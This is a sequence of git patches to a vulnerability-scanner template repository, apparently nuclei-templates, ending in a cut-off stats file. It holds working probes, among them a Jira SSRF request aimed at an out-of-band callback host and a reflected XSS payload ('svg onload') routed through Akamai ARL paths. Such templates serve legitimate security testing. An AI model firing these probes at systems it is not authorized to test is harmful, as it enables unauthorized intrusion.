https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json From 5bf63d18112fea521aaff9c9c66f22fe9c50ca18 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 30 Jul 2021 18:50:31 +0700 Subject: [PATCH 1306/4083] Update JIRA SSRF --- cves/2019/CVE-2019-8451.yaml | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/cves/2019/CVE-2019-8451.yaml b/cves/2019/CVE-2019-8451.yaml index 6355caf5ba..6c110b1978 100644 --- a/cves/2019/CVE-2019-8451.yaml +++ b/cves/2019/CVE-2019-8451.yaml @@ -8,17 +8,22 @@ info: reference: | - https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in - https://jira.atlassian.com/browse/JRASERVER-69793 + - https://hackerone.com/reports/713900 tags: cve,cve2019,atlassian,jira,ssrf requests: - - method: GET + - method: POST path: - - '{{BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://{{Hostname}}:1337@example.com' + - '{{BaseURL}}/plugins/servlet/gadgets/makeRequest' + + data: | + url=https://{{Hostname}}:443@{{interactsh-url}} headers: X-Atlassian-token: no-check + Content-Type: application/x-www-form-urlencoded + matchers: - type: word - name: ssrf-response-body + part: interactsh_protocol words: - - '

    This domain is for use in illustrative examples in documents.' - part: body + - "dns" From ff344b0e499a16da6a71ec0e3ba801c193ed962f Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 30 Jul 2021 17:35:48 +0530 Subject: [PATCH 1307/4083] Update CVE-2019-8451.yaml --- cves/2019/CVE-2019-8451.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-8451.yaml b/cves/2019/CVE-2019-8451.yaml index 6c110b1978..046a1055aa 100644 --- a/cves/2019/CVE-2019-8451.yaml +++ b/cves/2019/CVE-2019-8451.yaml @@ -15,7 +15,7 @@ requests: - method: POST path: - '{{BaseURL}}/plugins/servlet/gadgets/makeRequest' - + data: | url=https://{{Hostname}}:443@{{interactsh-url}} headers: From 51915f8f9ad26b769fe7f5698f5aa24309d90ca3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 30 Jul 2021 18:01:05 +0530 Subject: [PATCH 1308/4083] Template improvements --- exposures/files/github-gemfile-files.yaml | 31 +++++++++++++++++++ exposures/files/github-page-config.yaml | 25 ++++++++++++++++ exposures/files/github-page-files.yaml | 36 ----------------------- 3 files changed, 56 insertions(+), 36 deletions(-) create mode 100644 exposures/files/github-gemfile-files.yaml create mode 100644 exposures/files/github-page-config.yaml delete mode 100644 exposures/files/github-page-files.yaml diff --git a/exposures/files/github-gemfile-files.yaml b/exposures/files/github-gemfile-files.yaml new file mode 100644 index 0000000000..7575c5c467 --- /dev/null +++ b/exposures/files/github-gemfile-files.yaml @@ -0,0 +1,31 @@ +id: github-gemfile-files + +info: + name: Github Gemfiles + author: hahwul + severity: info + description: Find github page files(Gemfile / Gemfile.lock) + +requests: + - method: GET + path: + - "{{BaseURL}}/Gemfile" + - "{{BaseURL}}/Gemfile.lock" + + matchers-condition: or + matchers: + - type: dsl + dsl: + - 'contains(body, "https://rubygems.org")' + - 'contains(body, "source")' + - 'contains(body, "gem")' + - 'status_code == 200' + condition: and + + - type: dsl + dsl: + - 'contains(body, "https://rubygems.org")' + - 'contains(body, "remote")' + - 'contains(body, "specs")' + - 'status_code == 200' + condition: and \ No newline at end of file diff --git a/exposures/files/github-page-config.yaml b/exposures/files/github-page-config.yaml new file mode 100644 index 0000000000..727b03a5b0 --- /dev/null +++ b/exposures/files/github-page-config.yaml @@ -0,0 +1,25 @@ +id: github-page-config + +info: + name: Github pages config file + author: hahwul + severity: info + description: Find github pages config file. + +requests: + - method: GET + path: + - "{{BaseURL}}/_config.yml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jekyll" + - "title" + - "baseurl" + condition: and diff --git a/exposures/files/github-page-files.yaml b/exposures/files/github-page-files.yaml deleted file mode 100644 index 90e8aef0c8..0000000000 --- a/exposures/files/github-page-files.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: github-page-files - -info: - name: Github page files - author: hahwul - severity: info - description: Find github page files(_config.yml / CNAME / Gemfile / Gemfile.lock) - -requests: - - method: GET - path: - - "{{BaseURL}}/_config.yml" - - "{{BaseURL}}/CNAME" - - "{{BaseURL}}/Gemfile" - - "{{BaseURL}}/Gemfile.lock" - redirects: true - max-redirects: 1 - headers: - User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "jekyll" - - "plugins" - - "baseurl" - - "gem" - - "github-pages" - - "bundler" - - "github.io" - condition: or From efb5b9e7a332ada7f6f20b25960b4e7f3e5304f8 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 30 Jul 2021 18:12:12 +0530 Subject: [PATCH 1309/4083] Added tags --- exposures/files/github-gemfile-files.yaml | 1 + exposures/files/github-page-config.yaml | 2 ++ 2 files changed, 3 insertions(+) diff --git a/exposures/files/github-gemfile-files.yaml b/exposures/files/github-gemfile-files.yaml index 7575c5c467..0444367a2f 100644 --- a/exposures/files/github-gemfile-files.yaml +++ b/exposures/files/github-gemfile-files.yaml @@ -5,6 +5,7 @@ info: author: hahwul severity: info description: Find github page files(Gemfile / Gemfile.lock) + tags: github,exposure requests: - method: GET diff --git a/exposures/files/github-page-config.yaml b/exposures/files/github-page-config.yaml index 727b03a5b0..25a7409061 100644 --- a/exposures/files/github-page-config.yaml +++ b/exposures/files/github-page-config.yaml @@ -1,3 +1,4 @@ + id: github-page-config info: @@ -5,6 +6,7 @@ info: author: hahwul severity: info description: Find github pages config file. + tags: github,exposure requests: - method: GET From 7fe896ae45cd228231c1f4a52418407aedb78b9c Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 30 Jul 2021 18:13:32 +0530 Subject: [PATCH 1310/4083] Update github-page-config.yaml --- exposures/files/github-page-config.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/exposures/files/github-page-config.yaml b/exposures/files/github-page-config.yaml index 25a7409061..368ddee069 100644 --- a/exposures/files/github-page-config.yaml +++ b/exposures/files/github-page-config.yaml @@ -1,4 +1,3 @@ - id: github-page-config info: @@ -24,4 +23,4 @@ requests: - "jekyll" - "title" - "baseurl" - condition: and + condition: and \ No newline at end of file From 1cce455f1c333ec80d3eeed510b119b92936dcb5 Mon Sep 17 00:00:00 2001 From: Toufik Airane Date: Fri, 30 Jul 2021 16:40:41 +0200 Subject: [PATCH 1311/4083] Update CVE-2020-13927.yaml Following the discussion https://github.com/projectdiscovery/nuclei-templates/discussions/1477. According to NIST, It's a critical issue. https://nvd.nist.gov/vuln/detail/CVE-2020-13927 --- cves/2020/CVE-2020-13927.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-13927.yaml b/cves/2020/CVE-2020-13927.yaml index 0a5d03ba2a..4d8a08fa63 100644 --- a/cves/2020/CVE-2020-13927.yaml +++ b/cves/2020/CVE-2020-13927.yaml @@ -3,7 +3,7 @@ id: CVE-2020-13927 info: name: Unauthenticated Airflow Experimental REST API author: pdteam - severity: medium + severity: critical tags: cve,cve2020,apache,airflow,unauth requests: @@ -17,4 +17,4 @@ requests: - '"dag_run_url":' - '"dag_id":' - '"items":' - condition: and \ No newline at end of file + condition: and From 83a1769c0433bb11a6f7490ef1e157362a52e570 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 31 Jul 2021 00:53:25 +0530 Subject: [PATCH 1312/4083] Added Open Akamai ARL XSS Detection --- misconfiguration/akamai-arl-xss.yaml | 31 ++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 misconfiguration/akamai-arl-xss.yaml diff --git a/misconfiguration/akamai-arl-xss.yaml b/misconfiguration/akamai-arl-xss.yaml new file mode 100644 index 0000000000..1acd46aec1 --- /dev/null +++ b/misconfiguration/akamai-arl-xss.yaml @@ -0,0 +1,31 @@ +id: akamai-arl-xss + +info: + name: Open Akamai ARL XSS + author: pdteam + severity: medium + tags: akamai,xss + reference: | + - https://github.com/war-and-code/akamai-arl-hack + - https://twitter.com/SpiderSec/status/1421176297548435459 + - https://warandcode.com/post/akamai-arl-hack/ + - https://github.com/cybercdh/goarl + - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US + +requests: + - method: GET + path: + - "{{BaseURL}}/7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E" + + matchers-condition: and + matchers: + - type: word + condition: and + words: + - '">' + - 'Suggestions for improving the results' + + - type: word + part: header + words: + - 'text/html' \ No newline at end of file From 5ac86db16eaf5c0aa098c526fdbc387513c9f200 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 30 Jul 2021 19:24:16 +0000 Subject: [PATCH 1313/4083] Auto Generated Templates Stats [Fri Jul 30 19:24:16 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1278 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 663 insertions(+), 637 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 7f012a1194..9d4a1b263a 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":511},{"name":"panel","count":202},{"name":"xss","count":182},{"name":"wordpress","count":180},{"name":"exposure","count":176},{"name":"rce","count":173},{"name":"cve2020","count":145},{"name":"lfi","count":143},{"name":"wp-plugin","count":120},{"name":"config","count":90},{"name":"cve2021","count":83},{"name":"cve2019","count":82},{"name":"tech","count":78},{"name":"takeover","count":72},{"name":"cve2018","count":66},{"name":"","count":66},{"name":"token","count":63},{"name":"apache","count":61},{"name":"default-login","count":50},{"name":"iot","count":43},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":40},{"name":"network","count":35},{"name":"sqli","count":34},{"name":"oob","count":32},{"name":"logs","count":29},{"name":"workflow","count":29},{"name":"oracle","count":29},{"name":"ssrf","count":27},{"name":"misc","count":27},{"name":"jira","count":26},{"name":"atlassian","count":26},{"name":"disclosure","count":25},{"name":"cve2016","count":23},{"name":"listing","count":22},{"name":"redirect","count":20},{"name":"aem","count":19},{"name":"cisco","count":17},{"name":"sap","count":16},{"name":"debug","count":14},{"name":"fuzz","count":13},{"name":"misconfig","count":13},{"name":"struts","count":13},{"name":"cve2015","count":13},{"name":"adobe","count":12},{"name":"weblogic","count":12},{"name":"android","count":12},{"name":"auth-bypass","count":12},{"name":"zoho","count":11},{"name":"springboot","count":11},{"name":"cve2011","count":11},{"name":"dns","count":11},{"name":"cve2012","count":11},{"name":"dlink","count":10},{"name":"jenkins","count":10},{"name":"cve2014","count":10},{"name":"php","count":10},{"name":"cve2013","count":10},{"name":"devops","count":10},{"name":"magento","count":9},{"name":"gitlab","count":8},{"name":"router","count":8},{"name":"ftp","count":8},{"name":"airflow","count":8},{"name":"aws","count":8},{"name":"rails","count":8},{"name":"cnvd","count":8},{"name":"vmware","count":7},{"name":"xxe","count":7},{"name":"joomla","count":7},{"name":"nginx","count":7},{"name":"scada","count":7},{"name":"citrix","count":6},{"name":"api","count":6},{"name":"cms","count":6},{"name":"rconfig","count":6},{"name":"backup","count":6},{"name":"coldfusion","count":6},{"name":"jetty","count":6},{"name":"google","count":6},{"name":"java","count":5},{"name":"headless","count":5},{"name":"netgear","count":5},{"name":"confluence","count":5},{"name":"circarlife","count":5},{"name":"drupal","count":5},{"name":"cve2009","count":5},{"name":"phpmyadmin","count":5},{"name":"ruijie","count":5},{"name":"dedecms","count":5},{"name":"iis","count":5},{"name":"dell","count":5},{"name":"laravel","count":5},{"name":"files","count":5},{"name":"login","count":5},{"name":"lucee","count":5},{"name":"solr","count":5},{"name":"ssti","count":5},{"name":"django","count":5},{"name":"ibm","count":5},{"name":"fileupload","count":4},{"name":"solarwinds","count":4},{"name":"webserver","count":4},{"name":"tomcat","count":4},{"name":"elastic","count":4},{"name":"moodle","count":4},{"name":"jolokia","count":4},{"name":"docker","count":4},{"name":"crlf","count":4},{"name":"hongdian","count":4},{"name":"nodejs","count":4},{"name":"traversal","count":4},{"name":"vpn","count":4},{"name":"magmi","count":4},{"name":"samsung","count":4},{"name":"thinkphp","count":4},{"name":"asp","count":4},{"name":"thinkcmf","count":4},{"name":"artifactory","count":4},{"name":"openssh","count":3},{"name":"vbulletin","count":3},{"name":"deserialization","count":3},{"name":"log","count":3},{"name":"fpd","count":3},{"name":"bypass","count":3},{"name":"fanruan","count":3},{"name":"nacos","count":3},{"name":"windows","count":3},{"name":"git","count":3},{"name":"resin","count":3},{"name":"cve2010","count":3},{"name":"targa","count":3},{"name":"springcloud","count":3},{"name":"hp","count":3},{"name":"oa","count":3},{"name":"kubernetes","count":3},{"name":"grafana","count":3},{"name":"r-seenet","count":3},{"name":"ssh","count":3},{"name":"slack","count":3},{"name":"backups","count":3},{"name":"mongodb","count":3},{"name":"terramaster","count":3},{"name":"nosqli","count":3},{"name":"printer","count":3},{"name":"ebs","count":3},{"name":"amazon","count":3},{"name":"ofbiz","count":3},{"name":"kafka","count":3},{"name":"microstrategy","count":3},{"name":"caucho","count":3},{"name":"lfr","count":3},{"name":"sonarqube","count":2},{"name":"shellshock","count":2},{"name":"fortios","count":2},{"name":"strapi","count":2},{"name":"dos","count":2},{"name":"saltstack","count":2},{"name":"showdoc","count":2},{"name":"openam","count":2},{"name":"cve2007","count":2},{"name":"frp","count":2},{"name":"nagios","count":2},{"name":"proxy","count":2},{"name":"seeyon","count":2},{"name":"keycloak","count":2},{"name":"cve2008","count":2},{"name":"bitrix","count":2},{"name":"smb","count":2},{"name":"plesk","count":2},{"name":"injection","count":2},{"name":"spark","count":2},{"name":"nexus","count":2},{"name":"openfire","count":2},{"name":"rockethchat","count":2},{"name":"jboss","count":2},{"name":"sharepoint","count":2},{"name":"kibana","count":2},{"name":"nextjs","count":2},{"name":"vrealize","count":2},{"name":"emerge","count":2},{"name":"leak","count":2},{"name":"cache","count":2},{"name":"yapi","count":2},{"name":"sonicwall","count":2},{"name":"prometheus","count":2},{"name":"paloalto","count":2},{"name":"microsoft","count":2},{"name":"trixbox","count":2},{"name":"kevinlab","count":2},{"name":"xxljob","count":2},{"name":"intrusive","count":2},{"name":"voipmonitor","count":2},{"name":"huawei","count":2},{"name":"hjtcloud","count":2},{"name":"mail","count":2},{"name":"rstudio","count":2},{"name":"igs","count":2},{"name":"odoo","count":2},{"name":"chiyu","count":2},{"name":"webcam","count":2},{"name":"ucmdb","count":2},{"name":"glassfish","count":2},{"name":"telerik","count":2},{"name":"zhiyuan","count":2},{"name":"zabbix","count":2},{"name":"flir","count":2},{"name":"service","count":2},{"name":"kentico","count":2},{"name":"splunk","count":2},{"name":"icewarp","count":2},{"name":"bigip","count":2},{"name":"pega","count":2},{"name":"wordfence","count":2},{"name":"linkerd","count":2},{"name":"ecology","count":2},{"name":"chamilo","count":2},{"name":"idrac","count":2},{"name":"smtp","count":2},{"name":"natshell","count":2},{"name":"hpe","count":2},{"name":"globalprotect","count":2},{"name":"oauth","count":2},{"name":"waf","count":2},{"name":"maian","count":2},{"name":"mida","count":2},{"name":"httpd","count":2},{"name":"jellyfin","count":2},{"name":"rockmongo","count":2},{"name":"activemq","count":2},{"name":"couchdb","count":2},{"name":"hashicorp","count":2},{"name":"gitlist","count":1},{"name":"jquery","count":1},{"name":"razor","count":1},{"name":"checkpoint","count":1},{"name":"erp-nc","count":1},{"name":"mongo","count":1},{"name":"idemia","count":1},{"name":"shopware","count":1},{"name":"sangfor","count":1},{"name":"pagespeed","count":1},{"name":"bookstack","count":1},{"name":"spidercontrol","count":1},{"name":"timeclock","count":1},{"name":"zend","count":1},{"name":"tensorboard","count":1},{"name":"blind","count":1},{"name":"klog","count":1},{"name":"varnish","count":1},{"name":"javamelody","count":1},{"name":"2014","count":1},{"name":"oscommerce","count":1},{"name":"discourse","count":1},{"name":"bolt","count":1},{"name":"payara","count":1},{"name":"avalanche","count":1},{"name":"eprints","count":1},{"name":"acexy","count":1},{"name":"mongoshake","count":1},{"name":"wildfly","count":1},{"name":"lancom","count":1},{"name":"magicflow","count":1},{"name":"cloudflare","count":1},{"name":"wazuh","count":1},{"name":"selea","count":1},{"name":"pippoint","count":1},{"name":"bruteforce","count":1},{"name":"tenda","count":1},{"name":"backdoor","count":1},{"name":"swagger","count":1},{"name":"wifisky","count":1},{"name":"socomec","count":1},{"name":"csod","count":1},{"name":"octoprint","count":1},{"name":"etouch","count":1},{"name":"proftpd","count":1},{"name":"wavemaker","count":1},{"name":"clave","count":1},{"name":"plugin","count":1},{"name":"fortigates","count":1},{"name":"fortinet","count":1},{"name":"tensorflow","count":1},{"name":"szhe","count":1},{"name":"phpunit","count":1},{"name":"acme","count":1},{"name":"phalcon","count":1},{"name":"dvwa","count":1},{"name":"ganglia","count":1},{"name":"extractor","count":1},{"name":"fortiweb","count":1},{"name":"panabit","count":1},{"name":"moin","count":1},{"name":"grav","count":1},{"name":"bitly","count":1},{"name":"manageengine","count":1},{"name":"phpfusion","count":1},{"name":"hiboss","count":1},{"name":"mdb","count":1},{"name":"mirai","count":1},{"name":"netdata","count":1},{"name":"liferay","count":1},{"name":"rfi","count":1},{"name":"monitorix","count":1},{"name":"tongda","count":1},{"name":"gloo","count":1},{"name":"expose","count":1},{"name":"trilithic","count":1},{"name":"scimono","count":1},{"name":"visualtools","count":1},{"name":"drone","count":1},{"name":"vsftpd","count":1},{"name":"expn","count":1},{"name":"skywalking","count":1},{"name":"lanproxy","count":1},{"name":"huijietong","count":1},{"name":"jeewms","count":1},{"name":"rhymix","count":1},{"name":"dotnet","count":1},{"name":"soar","count":1},{"name":"k8","count":1},{"name":"jenkin","count":1},{"name":"opensns","count":1},{"name":"nuxeo","count":1},{"name":"nette","count":1},{"name":"nc2","count":1},{"name":"plc","count":1},{"name":"crm","count":1},{"name":"ssltls","count":1},{"name":"redwood","count":1},{"name":"nordex","count":1},{"name":"wso2","count":1},{"name":"goahead","count":1},{"name":"doh","count":1},{"name":"lansweeper","count":1},{"name":"harbor","count":1},{"name":"firebase","count":1},{"name":"redhat","count":1},{"name":"wiki","count":1},{"name":"sceditor","count":1},{"name":"sitecore","count":1},{"name":"vsphere","count":1},{"name":"ec2","count":1},{"name":"plone","count":1},{"name":"primetek","count":1},{"name":"wuzhicms","count":1},{"name":"lotuscms","count":1},{"name":"fedora","count":1},{"name":"itop","count":1},{"name":"monitorr","count":1},{"name":"dotclear","count":1},{"name":"triconsole","count":1},{"name":"circontrol","count":1},{"name":"lutron","count":1},{"name":"bash","count":1},{"name":"st","count":1},{"name":"alibaba","count":1},{"name":"parentlink","count":1},{"name":"diris","count":1},{"name":"totaljs","count":1},{"name":"comodo","count":1},{"name":"nexusdb","count":1},{"name":"circontrorl","count":1},{"name":"zte","count":1},{"name":"nuuo","count":1},{"name":"postmessage","count":1},{"name":"setup","count":1},{"name":"mautic","count":1},{"name":"zarafa","count":1},{"name":"zmanda","count":1},{"name":"dotnetnuke","count":1},{"name":"beanshell","count":1},{"name":"upload","count":1},{"name":"blue-ocean","count":1},{"name":"plastic","count":1},{"name":"vscode","count":1},{"name":"ruby","count":1},{"name":"fastapi","count":1},{"name":"ulterius","count":1},{"name":"xunchi","count":1},{"name":"sentry","count":1},{"name":"ruckus","count":1},{"name":"nsasg","count":1},{"name":"jmx","count":1},{"name":"chinaunicom","count":1},{"name":"darkstat","count":1},{"name":"memcached","count":1},{"name":"stem","count":1},{"name":"grails","count":1},{"name":"kafdrop","count":1},{"name":"enum","count":1},{"name":"zimbra","count":1},{"name":"ilo4","count":1},{"name":"rdp","count":1},{"name":"anchorcms","count":1},{"name":"nedi","count":1},{"name":"mara","count":1},{"name":"mantis","count":1},{"name":"sco","count":1},{"name":"faraday","count":1},{"name":"hasura","count":1},{"name":"kerbynet","count":1},{"name":"servicedesk","count":1},{"name":"opentsdb","count":1},{"name":"salesforce","count":1},{"name":"fastcgi","count":1},{"name":"appweb","count":1},{"name":"openerp","count":1},{"name":"woocomernce","count":1},{"name":"octobercms","count":1},{"name":"linkedin","count":1},{"name":"yachtcontrol","count":1},{"name":"zm","count":1},{"name":"tapestry","count":1},{"name":"vnc","count":1},{"name":"node-red-dashboard","count":1},{"name":"mobileiron","count":1},{"name":"ssl","count":1},{"name":"ecom","count":1},{"name":"empirecms","count":1},{"name":"postgres","count":1},{"name":"svnserve","count":1},{"name":"heroku","count":1},{"name":"moinmoin","count":1},{"name":"centos","count":1},{"name":"jitsi","count":1},{"name":"cacti","count":1},{"name":"cse","count":1},{"name":"cocoon","count":1},{"name":"csrf","count":1},{"name":"timesheet","count":1},{"name":"keenetic","count":1},{"name":"xff","count":1},{"name":"flash","count":1},{"name":"gogs","count":1},{"name":"majordomo2","count":1},{"name":"opensmtpd","count":1},{"name":"exchange","count":1},{"name":"opm","count":1},{"name":"fuelcms","count":1},{"name":"pulsesecure","count":1},{"name":"pgadmin","count":1},{"name":"webui","count":1},{"name":"tpshop","count":1},{"name":"interlib","count":1},{"name":"mpsec","count":1},{"name":"exacqvision","count":1},{"name":"sprintful","count":1},{"name":"bullwark","count":1},{"name":"netrc","count":1},{"name":"openrestry","count":1},{"name":"smartsense","count":1},{"name":"flink","count":1},{"name":"metinfo","count":1},{"name":"robomongo","count":1},{"name":"emc","count":1},{"name":"fortigate","count":1},{"name":"cve2005","count":1},{"name":"gridx","count":1},{"name":"synnefo","count":1},{"name":"calendarix","count":1},{"name":"eyou","count":1},{"name":"xdcms","count":1},{"name":"subrion","count":1},{"name":"servicenow","count":1},{"name":"rmi","count":1},{"name":"db","count":1},{"name":"enumeration","count":1},{"name":"powercreator","count":1},{"name":"jenzabar","count":1},{"name":"zzzcms","count":1},{"name":"openstack","count":1},{"name":"ems","count":1},{"name":"wmt","count":1},{"name":"chevereto","count":1},{"name":"74cms","count":1},{"name":"mailchimp","count":1},{"name":"webadmin","count":1},{"name":"glances","count":1},{"name":"cgi","count":1},{"name":"episerver","count":1},{"name":"dompdf","count":1},{"name":"rsyncd","count":1},{"name":"shopxo","count":1},{"name":"aspnuke","count":1},{"name":"viewpoint","count":1},{"name":"mariadb","count":1},{"name":"wavlink","count":1},{"name":"javafaces","count":1},{"name":"webmodule-ee","count":1},{"name":"hortonworks","count":1},{"name":"kubeflow","count":1},{"name":"sqlite","count":1},{"name":"cors","count":1},{"name":"geutebruck","count":1},{"name":"labtech","count":1},{"name":"apiman","count":1},{"name":"nps","count":1},{"name":"jnoj","count":1},{"name":"azure","count":1},{"name":"fortilogger","count":1},{"name":"zenario","count":1},{"name":"duomicms","count":1},{"name":"seacms","count":1},{"name":"linksys","count":1},{"name":"thinkadmin","count":1},{"name":"finereport","count":1},{"name":"viewlinc","count":1},{"name":"haproxy","count":1},{"name":"spring","count":1},{"name":"npm","count":1},{"name":"xml","count":1},{"name":"wamp","count":1},{"name":"spectracom","count":1},{"name":"ricoh","count":1},{"name":"pacsone","count":1},{"name":"rubedo","count":1},{"name":"xmlchart","count":1},{"name":"concrete","count":1},{"name":"landray","count":1},{"name":"accela","count":1},{"name":"mediumish","count":1},{"name":"alerta","count":1},{"name":"k8s","count":1},{"name":"avtech","count":1},{"name":"akamai","count":1},{"name":"weiphp","count":1},{"name":"ntopng","count":1},{"name":"wp-theme","count":1},{"name":"turbocrm","count":1},{"name":"netis","count":1},{"name":"expressjs","count":1},{"name":"kyan","count":1},{"name":" default-login","count":1},{"name":"redis","count":1},{"name":"starttls","count":1},{"name":"livezilla","count":1},{"name":"dlogin","count":1},{"name":"ns","count":1},{"name":"esmtp","count":1},{"name":"tika","count":1},{"name":"uwsgi","count":1},{"name":"sarg","count":1},{"name":"glpi","count":1},{"name":"rmc","count":1},{"name":"kong","count":1},{"name":"favicon","count":1},{"name":"fiori","count":1},{"name":"cloudinary","count":1},{"name":"blackboard","count":1},{"name":"symfony","count":1},{"name":"panos","count":1},{"name":"landrayoa","count":1},{"name":"druid","count":1},{"name":"gateone","count":1},{"name":"redcap","count":1},{"name":"svn","count":1},{"name":"aura","count":1},{"name":"floc","count":1},{"name":"feifeicms","count":1},{"name":"arl","count":1},{"name":"lighttpd","count":1},{"name":"portainer","count":1},{"name":"hadoop","count":1},{"name":"maccmsv10","count":1},{"name":"wooyun","count":1},{"name":"solman","count":1},{"name":"horde","count":1},{"name":"sidekiq","count":1},{"name":"krweb","count":1},{"name":"htmli","count":1},{"name":"myucms","count":1},{"name":"h3c-imc","count":1},{"name":"tileserver","count":1},{"name":"email","count":1},{"name":"iptime","count":1},{"name":"domxss","count":1},{"name":"ueditor","count":1},{"name":"bedita","count":1},{"name":"traefik","count":1},{"name":"mcafee","count":1},{"name":"commscope","count":1},{"name":"geddy","count":1},{"name":"realteo","count":1},{"name":"addpac","count":1},{"name":"jfrog","count":1},{"name":"node","count":1},{"name":"biometrics","count":1},{"name":"optiLink","count":1},{"name":"webftp","count":1},{"name":"emby","count":1},{"name":"ioncube","count":1},{"name":"axis","count":1},{"name":"visionhub","count":1},{"name":"saltapi","count":1},{"name":"rabbitmq","count":1},{"name":"alertmanager","count":1},{"name":"codeigniter","count":1},{"name":"yii","count":1},{"name":"clusterengine","count":1},{"name":"status","count":1},{"name":"spf","count":1},{"name":"zcms","count":1},{"name":"jsf","count":1},{"name":"opencast","count":1},{"name":"zookeeper","count":1},{"name":"dom","count":1},{"name":"discord","count":1},{"name":"codemeter","count":1},{"name":"embedthis","count":1},{"name":"akkadian","count":1},{"name":"mysql","count":1},{"name":"phpinfo","count":1},{"name":"rujjie","count":1},{"name":"apos","count":1},{"name":"dvr","count":1},{"name":"xiuno","count":1},{"name":"nomad","count":1},{"name":"springframework","count":1},{"name":"ambari","count":1},{"name":"pyramid","count":1},{"name":"zeroshell","count":1},{"name":"clockwatch","count":1},{"name":"scs","count":1},{"name":"b2evolution","count":1},{"name":"netsweeper","count":1},{"name":"webmin","count":1},{"name":"cobub","count":1},{"name":"adminer","count":1},{"name":"jsp","count":1},{"name":"upnp","count":1},{"name":"tamronos","count":1},{"name":"javascript","count":1},{"name":"mantisbt","count":1}],"authors":[{"name":"dhiyaneshdk","count":220},{"name":"pikpikcu","count":195},{"name":"pdteam","count":187},{"name":"dwisiswant0","count":126},{"name":"geeknik","count":119},{"name":"daffainfo","count":99},{"name":"madrobot","count":60},{"name":"princechaddha","count":52},{"name":"gy741","count":48},{"name":"gaurang","count":42},{"name":"pussycat0x","count":34},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":20},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"philippedelteil","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":9},{"name":"righettod","count":9},{"name":"iamthefrogy","count":8},{"name":"melbadry9","count":8},{"name":"hackergautam","count":8},{"name":"nadino","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"0x240x23elu","count":7},{"name":"randomstr1ng","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"dr_set","count":7},{"name":"r3dg33k","count":7},{"name":"kophjager007","count":7},{"name":"emadshanab","count":7},{"name":"harshbothra_","count":7},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":4},{"name":"iamnoooob","count":4},{"name":"xelkomy","count":4},{"name":"rootxharsh","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"meme-lord","count":4},{"name":"github.com/its0x08","count":4},{"name":"yash anand @yashanand155","count":3},{"name":"mavericknerd","count":3},{"name":"fyoorer","count":3},{"name":"binaryfigments","count":3},{"name":"_generic_human_","count":3},{"name":"tess","count":3},{"name":"impramodsargar","count":3},{"name":"0w4ys","count":3},{"name":"jarijaas","count":3},{"name":"f1tz","count":3},{"name":"shine","count":3},{"name":"thomas_from_offensity","count":3},{"name":"z3bd","count":3},{"name":"dudez","count":3},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"bp0lr","count":2},{"name":"x1m_martijn","count":2},{"name":"0xrudra","count":2},{"name":"w4cky_","count":2},{"name":"0xsapra","count":2},{"name":"bsysop","count":2},{"name":"random-robbie","count":2},{"name":"manas_harsh","count":2},{"name":"shifacyclewala","count":2},{"name":"koti2","count":2},{"name":"lotusdll","count":2},{"name":"unstabl3","count":2},{"name":"udit_thakkur","count":2},{"name":"nkxxkn","count":2},{"name":"swissky","count":2},{"name":"afaq","count":2},{"name":"ree4pwn","count":2},{"name":"dheerajmadhukar","count":2},{"name":"randomrobbie","count":2},{"name":"0xelkomy","count":2},{"name":"pxmme1337","count":2},{"name":"vavkamil","count":2},{"name":"emenalf","count":2},{"name":"incogbyte","count":2},{"name":"gevakun","count":2},{"name":"moritz 